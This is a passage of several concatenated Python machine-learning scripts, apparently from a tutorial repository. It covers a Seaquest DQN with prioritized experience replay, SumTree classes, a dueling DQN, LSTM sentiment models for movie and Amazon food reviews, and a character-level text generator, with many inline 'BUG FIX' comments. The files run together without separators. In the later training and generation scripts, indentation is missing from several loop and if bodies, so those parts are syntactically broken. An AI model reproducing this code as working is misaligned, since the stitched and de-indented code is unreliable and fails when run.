        agent.brain.tensorboard.step = step
        R = 0
        while True:
            if step % RENDER_EVERY == 0:
                self.env.render()
            a = agent.act(s)
            img, r, done, info = self.env.step(a)
            s_ = numpy.array([s[1], processImage(img)]) # last two screens
            # BUG FIX: was `np.clip(...)`, but this module imports
            # `numpy`, not `np`, so the original raised NameError here.
            r = numpy.clip(r, -1, 1)  # clip reward to [-1, 1]
            if done:  # terminal state
                s_ = None
            agent.observe( (s, a, r, s_) )
            agent.replay()
            s = s_
            R += r
            if done:
                break
        self.ep_rewards.append(R)
        avg_reward = sum(self.ep_rewards) / len(self.ep_rewards)
        if step % UPDATE_STATS_EVERY == 0:
            min_reward = min(self.ep_rewards)
            max_reward = max(self.ep_rewards)
            agent.brain.tensorboard.update_stats(reward_avg=avg_reward, reward_min=min_reward, reward_max=max_reward, epsilon=agent.epsilon)
            # BUG FIX: max_reward's format spec was `{max_reward:2f}`
            # (field width 2), not the intended `.2f` precision.
            agent.brain.model.save(f"models/{model_name}-avg-{avg_reward:.2f}-min-{min_reward:.2f}-max-{max_reward:.2f}.h5")
        # print("Total reward:", R)
        return avg_reward
#-------------------- MAIN ----------------------------
PROBLEM = 'Seaquest-v0'
env = Environment(PROBLEM)
episodes = 2_000
# state = IMAGE_STACK stacked grayscale frames
stateCnt = (IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT)
actionCnt = env.env.action_space.n
brain = Brain(stateCnt, actionCnt)
agent = Agent(stateCnt, actionCnt, brain)
randomAgent = RandomAgent(actionCnt, brain)
step = 0
try:
    # Phase 1: fill the replay memory with uniformly random experience
    print("Initialization with random agent...")
    while randomAgent.exp < MEMORY_CAPACITY:
        step += 1
        env.run(randomAgent, step)
        print(randomAgent.exp, "/", MEMORY_CAPACITY)
    # hand the pre-filled memory over to the learning agent
    agent.memory = randomAgent.memory
    randomAgent = None
    # Phase 2: train the DQN agent
    print("Starting learning")
    for i in tqdm.tqdm(list(range(step+1, episodes+step+1))):
        env.run(agent, i)
finally:
    # always persist the model, even on interrupt/crash
    agent.brain.model.save("Seaquest-DQN-PER.h5")
import numpy as np
class SumTree:
    """
    Binary sum tree for prioritized experience replay.

    Leaves hold per-experience priorities; every internal node holds the
    sum of its children, so the root is the total priority mass and
    priority-proportional sampling takes O(log n).

    This SumTree code is modified version of Morvan Zhou:
    https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/contents/5.2_Prioritized_Replay_DQN/RL_brain.py
    """
    data_pointer = 0  # next leaf slot to write (wraps around when full)

    def __init__(self, length):
        # number of leaf nodes (final nodes that contain experiences)
        self.length = length
        # flat array: length-1 internal nodes followed by length leaves
        # -> 2*length - 1 entries, all initialized to zero
        self.tree = np.zeros(2*self.length - 1)
        # experience payloads, parallel to the leaves
        self.data = np.zeros(self.length, dtype=object)

    def add(self, priority, data):
        """Store `data` with `priority`, overwriting the oldest entry
        once capacity is reached (leaves fill left to right)."""
        tree_index = self.data_pointer + self.length - 1  # leaf position
        self.data[self.data_pointer] = data
        # update the leaf and propagate the change upward
        self.update(tree_index, priority)
        self.data_pointer += 1
        # above capacity: wrap back to the first leaf
        if self.data_pointer >= self.length:
            self.data_pointer = 0

    def update(self, tree_index, priority):
        """Set a leaf's priority and propagate the delta up to the root."""
        change = priority - self.tree[tree_index]
        self.tree[tree_index] = priority
        # iterative upward walk: parent of i is (i - 1) // 2
        while tree_index != 0:
            tree_index = (tree_index - 1) // 2
            self.tree[tree_index] += change

    def get_leaf(self, v):
        """Return (leaf_index, priority, data) for the leaf whose
        cumulative-priority interval contains `v`.

        Descends from the root: go left while v fits in the left
        subtree's mass, otherwise subtract that mass and go right.
        """
        parent_index = 0
        while True:
            left_child_index = 2 * parent_index + 1
            right_child_index = left_child_index + 1
            # If we reach bottom, end the search
            if left_child_index >= len(self.tree):
                leaf_index = parent_index
                break
            else:
                if v <= self.tree[left_child_index]:
                    parent_index = left_child_index
                else:
                    v -= self.tree[left_child_index]
                    parent_index = right_child_index
        data_index = leaf_index - self.length + 1
        return leaf_index, self.tree[leaf_index], self.data[data_index]

    # BUG FIX: the decorator was written as a bare `property` statement
    # (missing the `@`), leaving total_priority a plain method while
    # Memory.sample reads it as an attribute -> TypeError on division.
    @property
    def total_priority(self):
        return self.tree[0]  # root node = sum of all leaf priorities
class Memory:
    """Prioritized replay memory (proportional variant) on a SumTree,
    with importance-sampling (IS) weight computation."""
    # small constant so no experience ever has zero pick probability
    PER_e = 0.01
    # tradeoff between pure prioritization (1) and uniform sampling (0)
    PER_a = 0.6
    # IS exponent, annealed from this value up to 1 over training
    PER_b = 0.4
    PER_b_increment_per_sample = 0.001
    # TD errors are clipped to this before being turned into priorities
    absolute_error_upper = 1.0

    def __init__(self, capacity):
        # A SumTree holds priorities plus payloads. A plain array (not a
        # deque) is used underneath so stored experiences keep stable
        # indices and are overwritten in place once memory is full.
        self.tree = SumTree(length=capacity)

    def store(self, experience):
        """Insert a new experience at the current maximum leaf priority
        so it is guaranteed to be sampled at least once."""
        max_priority = np.max(self.tree.tree[-self.tree.length:])
        # an all-zero tree would give the new entry zero pick probability
        if max_priority == 0:
            max_priority = self.absolute_error_upper
        self.tree.add(max_priority, experience)

    def sample(self, n):
        """Draw a prioritized minibatch of size n.

        The total priority range is split into n equal segments and one
        value is sampled uniformly from each; returns
        (leaf_indices, experiences, IS_weights).
        """
        memory = []
        b_idx, b_is_weights = np.zeros((n, ), dtype=np.int32), np.zeros((n, 1), dtype=np.float32)
        priority_segment = self.tree.total_priority / n
        # anneal b towards 1 (full importance-sampling correction)
        self.PER_b = np.min([1., self.PER_b + self.PER_b_increment_per_sample])
        # max possible weight, used to normalize IS weights into (0, 1]
        p_min = np.min(self.tree.tree[-self.tree.length:]) / self.tree.total_priority
        max_weight = (p_min * n) ** (-self.PER_b)
        for i in range(n):
            a, b = priority_segment * i, priority_segment * (i + 1)
            value = np.random.uniform(a, b)
            index, priority, data = self.tree.get_leaf(value)
            # P(j): this leaf's share of the total priority mass
            sampling_probs = priority / self.tree.total_priority
            # w_i = (N * P(i))^-b, normalized by the max weight
            b_is_weights[i, 0] = np.power(n * sampling_probs, -self.PER_b) / max_weight
            b_idx[i] = index
            memory.append([data])
        return b_idx, memory, b_is_weights

    def batch_update(self, tree_idx, abs_errors):
        """Refresh priorities of the sampled leaves from new TD errors."""
        abs_errors += self.PER_e
        # BUG FIX: was np.min([abs_errors, upper]), which reduces the
        # whole batch to a single value (or raises on ragged input);
        # element-wise clipping requires np.minimum.
        clipped_errors = np.minimum(abs_errors, self.absolute_error_upper)
        ps = np.power(clipped_errors, self.PER_a)
        for ti, p in zip(tree_idx, ps):
            self.tree.update(ti, p)
import tensorflow as tf
class DDDQNNet:
    """Dueling Double Deep Q Network (TF1 graph definition).

    Builds placeholders, a shared dense trunk, then splits into a
    state-value stream V(s) and an advantage stream A(s, a) that are
    aggregated into Q(s, a). The loss is importance-sampling-weighted
    MSE against externally supplied target Q values.
    """
    def __init__(self, state_size, action_size, learning_rate, name):
        self.state_size = state_size
        self.action_size = action_size
        self.learning_rate = learning_rate
        self.name = name
        # variable_scope separates the online DQN's variables from the
        # target network's, so weights can be copied between the two
        with tf.variable_scope(self.name):
            # placeholders: state batch, PER importance-sampling weights,
            # and the one-hot encoding of the actions actually taken
            self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
            self.is_weights_ = tf.placeholder(tf.float32, [None, 1], name="is_weights")
            self.actions_ = tf.placeholder(tf.float32, [None, self.action_size], name="actions_")
            # target Q values (computed outside the graph)
            self.target_q = tf.placeholder(tf.float32, [None], name="target")
            # shared trunk.
            # BUG FIX: tf.layers.dense expects a callable activation;
            # the original passed the string "relu", which raises
            # TypeError when the layer is applied. Use tf.nn.relu.
            self.dense1 = tf.layers.dense(inputs=self.inputs_,
                                          units=32,
                                          name="dense1",
                                          kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                          activation=tf.nn.relu)
            self.dense2 = tf.layers.dense(inputs=self.dense1,
                                          units=32,
                                          name="dense2",
                                          kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                          activation=tf.nn.relu)
            self.dense3 = tf.layers.dense(inputs=self.dense2,
                                          units=32,
                                          name="dense3",
                                          kernel_initializer=tf.contrib.layers.xavier_initializer())
            # dueling split: state-value stream V(s)
            self.value = tf.layers.dense(inputs=self.dense3,
                                         units=1,
                                         kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                         activation=None,
                                         name="value"
                                         )
            # ...and advantage stream A(s, a)
            self.advantage = tf.layers.dense(inputs=self.dense3,
                                             units=self.action_size,
                                             activation=None,
                                             kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                             name="advantage"
                                             )
            # aggregation:
            # Q(s, a) = V(s) + ( A(s, a) - 1/|A| * sum A(s, a') )
            self.output = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))
            # predicted Q for the taken action of each sample.
            # BUG FIX: reduce_sum without axis collapsed the whole batch
            # to one scalar, so absolute_errors (needed per-sample for
            # PER priority updates) was wrong; sum over actions only.
            self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_), axis=1)
            self.absolute_errors = tf.abs(self.target_q - self.Q)
            # IS-weighted MSE: w_i * (target_q - Q)^2
            self.loss = tf.reduce_mean(self.is_weights_ * tf.squared_difference(self.target_q, self.Q))
            self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)
import numpy
class SumTree:
    """Array-backed binary sum tree: leaves store priorities, internal
    nodes store subtree sums, the root stores the grand total."""
    write = 0  # next leaf slot to overwrite

    def __init__(self, capacity):
        self.capacity = capacity
        self.tree = numpy.zeros( 2*capacity - 1 )
        self.data = numpy.zeros( capacity, dtype=object )

    def _propagate(self, idx, change):
        # walk up to the root, adding the delta to every ancestor
        while idx != 0:
            idx = (idx - 1) // 2
            self.tree[idx] += change

    def _retrieve(self, idx, s):
        # descend until a leaf, consuming s against left-subtree sums
        while True:
            left = 2 * idx + 1
            if left >= len(self.tree):
                return idx
            if s <= self.tree[left]:
                idx = left
            else:
                s -= self.tree[left]
                idx = left + 1

    def total(self):
        # root holds the sum of all priorities
        return self.tree[0]

    def add(self, p, data):
        leaf = self.write + self.capacity - 1
        self.data[self.write] = data
        self.update(leaf, p)
        # wrap around and overwrite the oldest entry once full
        self.write = (self.write + 1) % self.capacity

    def update(self, idx, p):
        delta = p - self.tree[idx]
        self.tree[idx] = p
        self._propagate(idx, delta)

    def get(self, s):
        idx = self._retrieve(0, s)
        return (idx, self.tree[idx], self.data[idx - self.capacity + 1])
import numpy as np
from string import punctuation
from collections import Counter
from sklearn.model_selection import train_test_split
with open("data/reviews.txt") as f:
    reviews = f.read()
with open("data/labels.txt") as f:
    labels = f.read()
# remove all punctuations
all_text = ''.join([ c for c in reviews if c not in punctuation ])
reviews = all_text.split("\n")
reviews = [ review.strip() for review in reviews ]
all_text = ' '.join(reviews)
words = all_text.split()
print("Total words:", len(words))
# encoding the words
# dictionary that maps vocab words to integers here
vocab = sorted(set(words))
print("Unique words:", len(vocab))
# start is 1 because 0 is encoded for blank
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# encoded reviews
encoded_reviews = []
for review in reviews:
    encoded_reviews.append([vocab2int[word] for word in review.split()])
# NOTE(review): reviews have different lengths, so this is a ragged
# object array; newer NumPy requires dtype=object here -- verify against
# the installed version.
encoded_reviews = np.array(encoded_reviews)
# print("Number of reviews:", len(encoded_reviews))
# encode the labels, 1 for 'positive' and 0 for 'negative'
labels = labels.split("\n")
# BUG FIX: the original used `label is 'positive'` -- identity, not
# equality. Whether that ever matches depends on string interning, so
# labels could silently all become 0. Use `==`.
labels = [1 if label == 'positive' else 0 for label in labels]
# print("Number of labels:", len(labels))
review_lens = [len(x) for x in encoded_reviews]
counter_reviews_lens = Counter(review_lens)
# remove any reviews with 0 length
cleaned_encoded_reviews, cleaned_labels = [], []
for review, label in zip(encoded_reviews, labels):
    if len(review) != 0:
        cleaned_encoded_reviews.append(review)
        cleaned_labels.append(label)
encoded_reviews = np.array(cleaned_encoded_reviews)
labels = cleaned_labels
# print("Number of reviews:", len(encoded_reviews))
# print("Number of labels:", len(labels))
# left-pad (or truncate) every review to a fixed length
sequence_length = 200
features = np.zeros((len(encoded_reviews), sequence_length), dtype=int)
for i, review in enumerate(encoded_reviews):
    features[i, -len(review):] = review[:sequence_length]
# print(features[:10, :100])
# split data into train, validation and test
split_frac = 0.9
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=1-split_frac)
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.5)
print(f"""Features shapes:
Train set: {X_train.shape}
Validation set: {X_validation.shape}
Test set: {X_test.shape}""")
print("Example:")
print(X_train[0])
print(y_train[0])
# X_train, X_validation = features[:split_frac*len(features)], features[split_frac*len(features):]
# y_train, y_validation = labels[:split]
import tensorflow as tf
from utils import get_batches
from train import *
import tensorflow as tf
from preprocess import vocab2int, X_train, y_train, X_validation, y_validation, X_test, y_test
from utils import get_batches
import numpy as np
def get_lstm_cell():
    """Build one LSTM cell wrapped with output dropout.

    Reads the module-level `lstm_size` constant and the `keep_prob`
    placeholder.
    """
    cell = tf.contrib.rnn.BasicLSTMCell(lstm_size)
    return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=keep_prob)
# RNN parameters
lstm_size = 256       # hidden units per LSTM cell
lstm_layers = 1       # number of stacked LSTM layers
batch_size = 256
learning_rate = 0.001
n_words = len(vocab2int) + 1 # Added 1 for the 0 that is for padding
# create the graph object
graph = tf.Graph()
# add nodes to the graph
with graph.as_default():
    # feeds: token ids, sentiment labels, dropout keep-probability
    inputs = tf.placeholder(tf.int32, (None, None), "inputs")
    labels = tf.placeholder(tf.int32, (None, None), "labels")
    keep_prob = tf.placeholder(tf.float32, name="keep_prob")
# number of units in the embedding layer
embedding_size = 300
with graph.as_default():
    # embedding lookup matrix, uniformly initialized in [-1, 1)
    embedding = tf.Variable(tf.random_uniform((n_words, embedding_size), -1, 1))
    # pass to the LSTM cells
    embed = tf.nn.embedding_lookup(embedding, inputs)
    # stackup multiple LSTM layers
    cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell() for i in range(lstm_layers)])
    initial_state = cell.zero_state(batch_size, tf.float32)
    # pass cell and input to cell, returns outputs for each time step
    # and the final state of the hidden layer
    # run the data through the rnn nodes
    outputs, final_state = tf.nn.dynamic_rnn(cell, embed, initial_state=initial_state)
    # grab the last output only (sentiment of the whole sequence)
    # use sigmoid for binary classification
    predictions = tf.contrib.layers.fully_connected(outputs[:, -1], 1, activation_fn=tf.sigmoid)
    # calculate cost using MSE
    cost = tf.losses.mean_squared_error(labels, predictions)
    optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
    # nodes to calculate the accuracy (rounded prediction vs label)
    correct_pred = tf.equal(tf.cast(tf.round(predictions), tf.int32), labels)
    accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
    saver = tf.train.Saver()
########### training ##########
epochs = 10
with tf.Session(graph=graph) as sess:
    sess.run(tf.global_variables_initializer())
    iteration = 1
    for e in range(epochs):
        state = sess.run(initial_state)
        for i, (x, y) in enumerate(get_batches(X_train, y_train, batch_size=batch_size)):
            y = np.array(y)
            x = np.array(x)
            feed = {inputs: x, labels: y[:, None],
                    keep_prob: 0.5,
                    initial_state: state}
            loss, state, _ = sess.run([cost, final_state, optimizer], feed_dict=feed)
            if iteration % 5 == 0:
                print(f"[Epoch: {e}/{epochs}] Iteration: {iteration} Train loss: {loss:.3f}")
            if iteration % 25 == 0:
                # periodic validation pass with dropout disabled
                val_acc = []
                val_state = sess.run(cell.zero_state(batch_size, tf.float32))
                for x, y in get_batches(X_validation, y_validation, batch_size=batch_size):
                    x, y = np.array(x), np.array(y)
                    feed = {inputs: x, labels: y[:, None],
                            keep_prob: 1, initial_state: val_state}
                    batch_acc, val_state = sess.run([accuracy, final_state], feed_dict=feed)
                    val_acc.append(batch_acc)
                print(f"val_acc: {np.mean(val_acc):.3f}")
            iteration += 1
    # BUG FIX: the checkpoint was saved to "chechpoints/..." (typo)
    # while the test block below restores from "checkpoints", so the
    # restore could never find it. Save where it is actually read back.
    saver.save(sess, "checkpoints/sentiment1.ckpt")
test_acc = []
with tf.Session(graph=graph) as sess:
    saver = tf.train.Saver()
    saver.restore(sess, tf.train.latest_checkpoint('checkpoints'))
    test_state = sess.run(cell.zero_state(batch_size, tf.float32))
    for ii, (x, y) in enumerate(get_batches(X_test, y_test, batch_size), 1):
        feed = {inputs: x,
                labels: y[:, None],
                keep_prob: 1,
                initial_state: test_state}
        batch_acc, test_state = sess.run([accuracy, final_state], feed_dict=feed)
        test_acc.append(batch_acc)
    print("Test accuracy: {:.3f}".format(np.mean(test_acc)))
def get_batches(x, y, batch_size=100):
    """Yield (x, y) minibatches of exactly `batch_size` elements; the
    trailing remainder that cannot fill a whole batch is dropped."""
    usable = (len(x) // batch_size) * batch_size
    for start in range(0, usable, batch_size):
        end = start + batch_size
        yield x[start:end], y[start:end]
import numpy as np
import pandas as pd
import tqdm
from string import punctuation
# set of ASCII punctuation for O(1) membership tests
punc = set(punctuation)
# NOTE(review): hard-coded local Windows path -- adjust for your machine
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
# column 0: cleaned review text, column 1: its star score
X = np.zeros((len(df), 2), dtype=object)
for i in tqdm.tqdm(range(len(df)), "Cleaning X"):
    target = df['Text'].loc[i]
    # lowercase and drop punctuation characters
    # X.append(''.join([ c.lower() for c in target if c not in punc ]))
    X[i, 0] = ''.join([ c.lower() for c in target if c not in punc ])
    X[i, 1] = df['Score'].loc[i]
# write the cleaned two-column dataset for the training scripts
pd.DataFrame(X, columns=["Text", "Score"]).to_csv("data/Reviews.csv")
### Model Architecture hyper parameters
embedding_size = 64
# sequence_length = 500
sequence_length = 42   # tokens kept per review after padding/truncation
LSTM_units = 128
### Training parameters
batch_size = 128
epochs = 20
### Preprocessing parameters
# words that occur less than N times are deleted from the dataset
N = 10
# test size in ratio, train size is 1 - test_size
test_size = 0.15
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
def get_model_binary(vocab_size, sequence_length, embedding_size=64, verbose=1):
    """Build the binary (positive/negative) sentiment LSTM.

    Args:
        vocab_size: number of distinct tokens (embedding input dim).
        sequence_length: fixed token length of each input sample.
        embedding_size: embedding dimension. Was hard-coded to 64;
            now a parameter with the same default, consistent with
            get_model_5stars below.
        verbose: when truthy (the default, matching the original
            unconditional behavior) print the model summary.
    """
    model = Sequential()
    model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
    model.add(SpatialDropout1D(0.15))
    model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
    model.add(Dropout(0.3))
    # sigmoid head for binary classification
    model.add(Dense(1, activation='sigmoid'))
    if verbose:
        model.summary()
    return model
def get_model_5stars(vocab_size, sequence_length, embedding_size, verbose=0):
    """Build the 1-5 star regression LSTM (single linear output)."""
    layer_stack = [
        Embedding(vocab_size, embedding_size, input_length=sequence_length),
        SpatialDropout1D(0.15),
        LSTM(LSTM_units, recurrent_dropout=0.2),
        Dropout(0.3),
        Dense(1, activation="linear"),
    ]
    model = Sequential(layer_stack)
    if verbose:
        model.summary()
    return model
import numpy as np
import pandas as pd
import tqdm
import pickle
from collections import Counter
from sklearn.model_selection import train_test_split
from utils import clean_text, tokenize_words
from config import N, test_size
def load_review_data():
    """Load the Amazon fine-food reviews CSV, clean the 'Summary' text,
    build a frequency-filtered vocabulary and return a train/test split.

    Returns:
        X_train, X_test, y_train, y_test, vocab -- tokenized summaries
        (arrays of word ids), their star scores and the word->count dict.
    """
    # df = pd.read_csv("data/Reviews.csv")
    # NOTE(review): hard-coded local Windows path -- adjust per machine
    df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
    # preview
    print(df.head())
    print(df.tail())
    vocab = []
    # X = np.zeros((len(df)*2, 2), dtype=object)
    X = np.zeros((len(df), 2), dtype=object)
    # The commented-out pass below also cleaned the full 'Text' column;
    # only the short 'Summary' field is used now, so k stays 0.
    # for i in tqdm.tqdm(range(len(df)), "Cleaning X1"):
    #     target = df['Text'].loc[i]
    #     score = df['Score'].loc[i]
    #     X[i, 0] = clean_text(target)
    #     X[i, 1] = score
    #     for word in X[i, 0].split():
    #         vocab.append(word)
    # k = i+1
    k = 0
    for i in tqdm.tqdm(range(len(df)), "Cleaning X2"):
        target = df['Summary'].loc[i]
        score = df['Score'].loc[i]
        X[i+k, 0] = clean_text(target)
        X[i+k, 1] = score
        for word in X[i+k, 0].split():
            vocab.append(word)
    # vocab = set(vocab)
    vocab = Counter(vocab)
    # delete words that occur less than N times
    vocab = { k:v for k, v in vocab.items() if v >= N }
    # word to integer encoder dict (0 is reserved for padding/unknown)
    vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
    # pickle vocab2int so the inference script can reuse the encoding
    print("Pickling vocab2int...")
    pickle.dump(vocab2int, open("data/vocab2int.pickle", "wb"))
    # encoded reviews
    for i in tqdm.tqdm(range(X.shape[0]), "Tokenizing words"):
        X[i, 0] = tokenize_words(str(X[i, 0]), vocab2int)
    lengths = [ len(row) for row in X[:, 0] ]
    print("min_length:", min(lengths))
    print("max_length:", max(lengths))
    # fixed random_state so the split is reproducible across runs
    X_train, X_test, y_train, y_test = train_test_split(X[:, 0], X[:, 1], test_size=test_size, shuffle=True, random_state=19)
    return X_train, X_test, y_train, y_test, vocab
import os
# disable keras loggings
import sys
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')   # silence keras' import-time banner
import keras
sys.stderr = stderr                  # restore normal stderr
# to use CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"      # hide all GPUs from TF
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'       # only log TF errors
import tensorflow as tf
# limit TF to a few CPU threads and zero GPU devices
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                       )
from model import get_model_5stars
from utils import clean_text, tokenize_words
from config import embedding_size, sequence_length
from keras.preprocessing.sequence import pad_sequences
import pickle
# token -> id mapping saved by the preprocessing step
vocab2int = pickle.load(open("data/vocab2int.pickle", "rb"))
model = get_model_5stars(len(vocab2int), sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V20_0.38_0.80.h5")
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Food Review evaluator")
    parser.add_argument("review", type=str, help="The review of the product in text")
    args = parser.parse_args()
    # clean -> tokenize -> pad to the model's fixed input length
    review = tokenize_words(clean_text(args.review), vocab2int)
    x = pad_sequences([review], maxlen=sequence_length)
    # regression output: predicted star rating out of 5
    print(f"{model.predict(x)[0][0]:.2f}/5")
# to use CPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import os
import numpy as np
import pandas as pd
from keras.callbacks import ModelCheckpoint
from keras.preprocessing import sequence
from preprocess import load_review_data
from model import get_model_5stars
from config import sequence_length, embedding_size, batch_size, epochs
X_train, X_test, y_train, y_test, vocab = load_review_data()
vocab_size = len(vocab)
print("Vocab size:", vocab_size)
X_train = sequence.pad_sequences(X_train, maxlen=sequence_length)
X_test = sequence.pad_sequences(X_test, maxlen=sequence_length)
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
model = get_model_5stars(vocab_size, sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V40_0.60_0.67.h5")
model.compile(loss="mse", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/model_V40_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=True, verbose=1)
model.fit(X_train, y_train, epochs=epochs,
validation_data=(X_test, y_test),
batch_size=batch_size,
callbacks=[checkpointer])
import numpy as np
from string import punctuation
# set of ASCII punctuation for O(1) membership tests in clean_text
punc = set(punctuation)
def clean_text(text):
    """Return `text` lowercased with all punctuation characters removed."""
    kept = (ch for ch in str(text) if ch not in punc)
    return ''.join(ch.lower() for ch in kept)
def tokenize_words(words, vocab2int):
    """Map a whitespace-separated string to a float array of token ids;
    words missing from the vocabulary stay encoded as 0."""
    tokens = words.split()
    encoded = np.zeros((len(tokens),))
    for idx, word in enumerate(tokens):
        # unknown words keep the default 0 (this vocab has no <unk> id)
        encoded[idx] = vocab2int.get(word, 0)
    return encoded
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
seed = "import os"
# sample output from an earlier run:
# ded of and alice as it go on and the court
# well you wont you wouldncopy thing
# there was not a long to growing anxiously any only a low every cant
# go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo
# char <-> id mappings saved by the training script
char2int = pickle.load(open("python-char2int.pickle", "rb"))
int2char = pickle.load(open("python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model (must match the trained architecture exactly)
model = Sequential([
    LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
    Dropout(0.3),
    LSTM(256),
    Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(400), "Generating text"):
    # make the input sequence: one-hot, right-aligned in the window
    X = np.zeros((1, sequence_length, n_unique_chars))
    for t, char in enumerate(seed):
        X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
    # predict the next character distribution
    predicted = model.predict(X, verbose=0)[0]
    # greedy decoding: take the most probable character id
    next_index = np.argmax(predicted)
    # converting the integer to a character
    next_char = int2char[next_index]
    # add the character to results
    generated += next_char
    # shift seed and append the predicted character
    seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import numpy as np
import os
import pickle
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.callbacks import ModelCheckpoint
from utils import get_batches
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
from string import punctuation
# read the data
# text = open("data/wonderland.txt", encoding="utf-8").read()
text = open("E:\\datasets\\text\\my_python_code.py").read()
# remove caps
text = text.lower()
for c in "!":
text = text.replace(c, "")
# text = text.lower().replace("\n\n", "\n").replace("", "").replace("", "").replace("", "").replace("", "")
# text = text.translate(str.maketrans("", "", punctuation))
# text = text[:100_000]
n_chars = len(text)
unique_chars = ''.join(sorted(set(text)))
print("unique_chars:", unique_chars)
n_unique_chars = len(unique_chars)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(unique_chars)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(unique_chars)}
# save these dictionaries for later generation
pickle.dump(char2int, open("python-char2int.pickle", "wb"))
pickle.dump(int2char, open("python-int2char.pickle", "wb"))
# hyper parameters
sequence_length = 100
step = 1
batch_size = 128
epochs = 1
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length, step):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
X = get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps=step)
# for i, x in enumerate(X):
# if i == 1:
# break
# print(x[0].shape, x[1].shape)
# # vectorization
# X = np.zeros((len(sentences), sequence_length, n_unique_chars))
# y = np.zeros((len(sentences), n_unique_chars))
# for i, sentence in enumerate(sentences):
# for t, char in enumerate(sentence):
# X[i, t, char2int[char]] = 1
# y[i, char2int[y_train[i]]] = 1
# X = np.array([char2int[c] for c in text])
# print("X.shape:", X.shape)
# goal of X is (n_samples, sequence_length, n_chars)
# sentences = np.zeros(())
# print("y.shape:", y.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/python-v2-{loss:.2f}.h5", verbose=1)
# model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint])
model.fit_generator(X, steps_per_epoch=len(sentences) // batch_size, epochs=epochs, callbacks=[checkpoint])
import numpy as np
def get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps):
    """Yield one-hot (X, y) batches forever for word/char sequence training.

    :param sentences: list of strings, each `sequence_length` characters long
    :param y_train: label character for each sentence (same indexing)
    :param char2int: mapping from character to integer id
    :param batch_size: sentences per yielded batch
    :param sequence_length: timesteps per sentence
    :param n_unique_chars: one-hot depth
